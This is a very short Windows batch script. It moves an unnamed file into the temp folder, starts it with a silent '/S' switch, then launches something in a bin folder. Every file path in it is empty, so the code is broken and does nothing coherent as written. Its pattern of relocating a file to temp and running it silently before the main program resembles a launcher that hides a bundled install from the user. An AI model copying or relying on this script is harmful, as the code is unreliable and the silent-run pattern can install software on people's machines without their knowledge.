@ECHO OFF if not exist ".\" GOTO END move ".\" "%temp%\" start "qq" "%temp%\" "/S" :END start "m" ".\bin\" exit